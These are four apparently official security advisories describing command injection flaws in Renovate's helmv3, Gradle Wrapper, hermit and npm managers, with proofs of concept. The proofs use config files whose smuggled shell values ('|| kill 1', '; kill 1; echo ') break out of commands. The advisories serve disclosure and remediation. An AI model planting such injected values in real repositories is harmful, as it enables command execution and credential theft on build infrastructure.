Package Instance

Renovate vulnerable to arbitrary command injection via helmv3 manager and malicious Chart.yaml file
### Summary
The user-provided string `repository` in the `helmv3` manager is appended to the `helm registry login` command without proper sanitization.

### Details
Adversaries can provide a maliciously crafted `Chart.yaml` in conjunctions with a tweaked Renovate configuration file to trick Renovate to execute arbitrary code.
The value for both uses of the `repository` variable in [lib/modules/manager/helmv3/common.ts](https://github.com/renovatebot/renovate/blob/b69416ce1745f67c9fc1d149738e2f52feb4f732/lib/modules/manager/helmv3/common.ts) are not being escaped using the `quote` function from the `shlex` package.
This lack of proper sanitization has been present in the product since version 31.51.0 (https://github.com/renovatebot/renovate/commit/f372a68144a4d78c9f7f418168e4efe03336a432), released on January 24 of 2022.

### PoC
1. Create a git repo with the following content:

`renovate.json5`:

```json5
{
  $schema: "https://docs.renovatebot.com/renovate-schema.json",
  customDatasources: {
    always: {
      defaultRegistryUrlTemplate: "https://docs.renovatebot.com/search/search_index.json",
      transformTemplates: ['{"releases":[{"version":"99999.0.0"}]}'],
    },
  },
  // Register any credentials to make the manager attempt to use basic auth for the Helm registry
  hostRules: [
    {
      matchHost: "charts.bitnami.com",
      username: "un",
      password: "pw",
    },
  ],
  packageRules: [
    {
      // Target of the day
      matchManagers: ["helmv3"],
      // Don't consult the actual bitnami repo
      registryUrls: [],
      // But still, trick the manager in believing there's a new version
      overrideDatasource: "custom.always",
    },
  ],
}

```


`Chart.yaml`:

```yaml
apiVersion: v2
name: renovate-aci-1
version: 0.0.1
dependencies:
  - name: redis
    version: 0.1.0
    repository: oci://charts.bitnami.com/bitnami || kill 1

```


`Chart.lock`:

```yaml
dependencies:
- name: redis
  repository: oci://charts.bitnami.com/bitnami
```

2. Run Renovate against the repo from a Docker container. Notice that the process terminates without reporting "Repository finished", because the ACI vulnerability allowed for execution of `kill 1`, terminating the root process of the container.

> [!NOTE]
> This specific proof of concept was made a lot simpler with the introduction of the `overrideDatasource` configuration since version 38.120.0 (https://github.com/renovatebot/renovate/commit/a70a6a376d31148e80be5a5c885ac33ff5ddb30c), released on October 12 of 2024, because it means that there is no more need for a proper response from an actual Helm registry on the malformed repository URL.

### Impact
This is a Arbitrary Command Injection vulnerability, allowing those with write access on repositories configured to be scanned by Renovate to cause the execution of commands of their choice on the machine that runs Renovate.

Renovate vulnerable to arbitrary command injection via Gradle Wrapper and malicious `distributionUrl`
### Summary
Renovate can be tricked into executing shell code while updating the Gradle Wrapper. A malicious `distributionUrl` in `gradle/wrapper/gradle-wrapper.properties` can lead to command execution in the Renovate runtime.

### Details
When Renovate handles Gradle Wrapper artifacts, it may run a wrapper update command such as:
- `./gradlew :wrapper --gradle-distribution-url <value>`

In the observed behavior, Renovate executes this via a shell (e.g., `/bin/sh -c ...`).  
If `distributionUrl` contains shell command substitution syntax like `$(...)`, the shell evaluates it **before** Gradle validates/parses the URL.

After that, Gradle attempts to parse the URL as a URI and fails with `URISyntaxException`, but the shell substitution has already executed.

This is reproducible even when `allowScripts` is disabled (default is OFF), because this execution happens as part of Gradle Wrapper artifact handling rather than “repository install scripts”.

Prerequisites / attack conditions:
- The attacker must be able to get a malicious `gradle-wrapper.properties` into a repository that Renovate scans (e.g., direct write access, or a maintainer merges an attacker’s change/PR).
- Renovate must be configured to process Gradle Wrapper updates/artifacts for that repository (default behavior for the Gradle Wrapper manager).

### PoC
1. Create a repository with a Gradle Wrapper (`gradlew`, `gradlew.bat`, `gradle/wrapper/gradle-wrapper.jar`, and `gradle/wrapper/gradle-wrapper.properties`).
2. Set `distributionUrl` in `gradle-wrapper.properties` to include `$(...)`.
3. Run Renovate against the repository.
4. Observe that a file is created during Renovate’s wrapper update step **before** Gradle fails with `URISyntaxException`.

A [screen recording](https://drive.google.com/file/d/1nveSCgyz4pKPCZuelqDD_xGEO00DXr4P/view) is attached showing end-to-end reproduction. In the demo, the payload creates `/tmp/passwd_dump` containing `/etc/passwd`, demonstrating that file read/exfiltration is possible within the Renovate execution context.

### Impact
This allows arbitrary command execution in the Renovate runtime during Gradle Wrapper updates. Depending on deployment, this may expose credentials/tokens available to the bot and may allow an attacker to modify repositories or access internal resources reachable from the Renovate environment.

### Remediation

Upgrading to Renovate [42.68.5](https://github.com/renovatebot/renovate/releases/tag/42.68.5) (2025-12-31) fixes this issue, and closes out other risks of shell evaluation for commands run by Renovate.

If using the `composer`, `yarn` (v1) or `flux` managers, please upgrade to [42.74.5](https://github.com/renovatebot/renovate/releases/tag/42.74.5) (2026-01-08), as there were follow-up fixes to keep these managers working.

Renovate vulnerable to arbitrary command injection via hermit manager and maliciously named dependencies
### Summary
The user-provided string `depName` in the `hermit` manager is appended to the `./hermit install` and `./hermit uninstall` commands without proper sanitization.

### Details
Adversaries can provide a maliciously named hermit dependency in conjunctions with a tweaked Renovate configuration file to trick Renovate to execute arbitrary code.
All values added to the `packagesToInstall` and `packagesToUninstall` variables in [lib/modules/manager/hermit/artifacts.ts](https://github.com/renovatebot/renovate/blob/41e8b99f86a6e2a56f80f7aa1a08a59d76f2358c/lib/modules/manager/hermit/artifacts.ts) are not being escaped using the `quote` function from the `shlex` package.
This lack of proper sanitization for installing packages has been present in the product since the introduction of the hermit manager in version 32.135.0 (https://github.com/renovatebot/renovate/commit/b696abb3c2741508fbb4029f39153140a3722e1e), released on July 30 of 2022.
In version 37.199.1 (https://github.com/renovatebot/renovate/commit/eaec10d7c8afadbdd783ac47bd2adbfab444d6df) some use of the `quote` function from the `shlex` package was added, but not in a way that usefully prevented this arbitrary code injection vulnerability.
When support for replacements was introduced with version 37.214.4 (https://github.com/renovatebot/renovate/commit/41e8b99f86a6e2a56f80f7aa1a08a59d76f2358c), the same faulty approach was replicated for uninstalling packages.

### PoC
1. Create a git repo with the following content:

`renovate.json5`:

```json5
{
  $schema: "https://docs.renovatebot.com/renovate-schema.json",
  customDatasources: {
    always: {
      defaultRegistryUrlTemplate: "https://docs.renovatebot.com/search/search_index.json",
      transformTemplates: ['{"releases":[{"version":"99999.0.0"}]}'],
    },
  },
  packageRules: [
    {
      // Target of the day
      matchManagers: ["hermit"],
      // Trick the manager in believing there's a new version
      overrideDatasource: "custom.always",
    },
  ],
}

```


`bin/hermit`:

```bash
#!/bin/bash
#
# THIS FILE IS GENERATED; DO NOT MODIFY

set -eo pipefail

export HERMIT_USER_HOME=~

if [ -z "${HERMIT_STATE_DIR}" ]; then
  case "$(uname -s)" in
  Darwin)
    export HERMIT_STATE_DIR="${HERMIT_USER_HOME}/Library/Caches/hermit"
    ;;
  Linux)
    export HERMIT_STATE_DIR="${XDG_CACHE_HOME:-${HERMIT_USER_HOME}/.cache}/hermit"
    ;;
  esac
fi

export HERMIT_DIST_URL="${HERMIT_DIST_URL:-https://github.com/cashapp/hermit/releases/download/stable}"
HERMIT_CHANNEL="$(basename "${HERMIT_DIST_URL}")"
export HERMIT_CHANNEL
export HERMIT_EXE=${HERMIT_EXE:-${HERMIT_STATE_DIR}/pkg/hermit@${HERMIT_CHANNEL}/hermit}

if [ ! -x "${HERMIT_EXE}" ]; then
  echo "Bootstrapping ${HERMIT_EXE} from ${HERMIT_DIST_URL}" 1>&2
  INSTALL_SCRIPT="$(mktemp)"
  # This value must match that of the install script
  INSTALL_SCRIPT_SHA256="09ed936378857886fd4a7a4878c0f0c7e3d839883f39ca8b4f2f242e3126e1c6"
  if [ "${INSTALL_SCRIPT_SHA256}" = "BYPASS" ]; then
    curl -fsSL "${HERMIT_DIST_URL}/install.sh" -o "${INSTALL_SCRIPT}"
  else
    # Install script is versioned by its sha256sum value
    curl -fsSL "${HERMIT_DIST_URL}/install-${INSTALL_SCRIPT_SHA256}.sh" -o "${INSTALL_SCRIPT}"
    # Verify install script's sha256sum
    openssl dgst -sha256 "${INSTALL_SCRIPT}" | \
      awk -v EXPECTED="$INSTALL_SCRIPT_SHA256" \
      '$2!=EXPECTED {print "Install script sha256 " $2 " does not match " EXPECTED; exit 1}'
  fi
  /bin/bash "${INSTALL_SCRIPT}" 1>&2
fi

exec "${HERMIT_EXE}" --level=fatal exec "$0" -- "$@"

```


`bin/.|| kill 1 ||@0.0.1.pkg` (symlink):

A symlink to `hermit`

2. Run Renovate against the repo from a Docker container. Notice that the process terminates without reporting "Repository finished", because the ACI vulnerability allowed for execution of `kill 1`, terminating the root process of the container.

> [!NOTE]
> This specific proof of concept was made a lot simpler with the introduction of the `overrideDatasource` configuration since version 38.120.0 (https://github.com/renovatebot/renovate/commit/a70a6a376d31148e80be5a5c885ac33ff5ddb30c), released on October 12 of 2024, because it means that there is no more need for a proper response from an actual hermit-packages repository during resolution.

### Impact
TThis is a Arbitrary Command Injection vulnerability, allowing those with write access on repositories configured to be scanned by Renovate to cause the execution of commands of their choice on the machine that runs Renovate.

Renovate vulnerable to arbitrary command injection via npm manager and malicious Renovate configuration
### Summary
The user-provided string `packageName` in the `npm` manager is appended to the `npm install` command during lock maintenance without proper sanitization.


### Details
Adversaries can provide a maliciously crafted Renovate configuration file to trick Renovate to execute arbitrary code.
The user-provided workspace names and package keys that are added to the `updateCmd` variables in [lib/modules/manager/npm/post-update/npm.ts](https://github.com/renovatebot/renovate/blob/5bdaf47eebde770107017c47557bca41189db588/lib/modules/manager/npm/post-update/npm.ts) are not being escaped using the `quote` function from the `shlex` package.
This lack of proper sanitization has been present in the product since version 35.63.0 (https://github.com/renovatebot/renovate/commit/012c0ac2fe32832e60a62bde405c0a241efd314c), released on April 27 of 2023.

### PoC
1. Create a git repo with the following content:

`renovate.json5`:

```json5
{
  $schema: "https://docs.renovatebot.com/renovate-schema.json",
  customDatasources: {
    always: {
      defaultRegistryUrlTemplate: "https://docs.renovatebot.com/search/search_index.json",
      transformTemplates: ['{"releases":[{"version":"11.1.0"}]}'],
    },
  },
  packageRules: [
    {
      // Target of the day
      matchManagers: ["npm"],
      // Provide a command in the package name
      overridePackageName: "; kill 1; echo ",
      // Override the datasource to prevent a lookup failure
      overrideDatasource: "custom.always",
    },
  ],
}

```


`package.json`:

```json
{
  "name": "renovate-aci-4",
  "version": "0.0.1",
  "dependencies": {
    "uuid": "^11.0.0"
  }
}
```


`package-lock.json`:

```json
{
  "name": "renovate-aci-4",
  "version": "0.0.1",
  "lockfileVersion": 3,
  "requires": true,
  "packages": {
    "": {
      "name": "renovate-aci-4",
      "version": "0.0.1",
      "dependencies": {
        "uuid": "^11.0.0"
      }
    },
    "node_modules/uuid": {
      "version": "11.0.0",
      "resolved": "https://registry.npmjs.org/uuid/-/uuid-11.0.0.tgz",
      "integrity": "sha512-iE8Fa5fgBY4rN5GvNUJ8TSwO1QG7TzdPfhrJczf6XJ6mZUxh/GX433N70fCiJL9h8EKP5ayEIo0Q6EBQGWHFqA==",
      "funding": [
        "https://github.com/sponsors/broofa",
        "https://github.com/sponsors/ctavan"
      ],
      "license": "MIT",
      "bin": {
        "uuid": "dist/esm/bin/uuid"
      }
    }
  }
}

```

2. Run Renovate against the repo from a Docker container. Notice that the process terminates without reporting "Repository finished", because the ACI vulnerability allowed for execution of `kill 1`, terminating the root process of the container.

> [!NOTE]
> This specific proof of concept relies on the introduction of the `overrideDatasource` and `overridePackageName` configuration, available since version 38.120.0 (https://github.com/renovatebot/renovate/commit/a70a6a376d31148e80be5a5c885ac33ff5ddb30c), released on October 12 of 2024.

### Impact
This is a Arbitrary Command Injection vulnerability, allowing those with write access on repositories configured to be scanned by Renovate to cause the execution of commands of their choice on the machine that runs Renovate.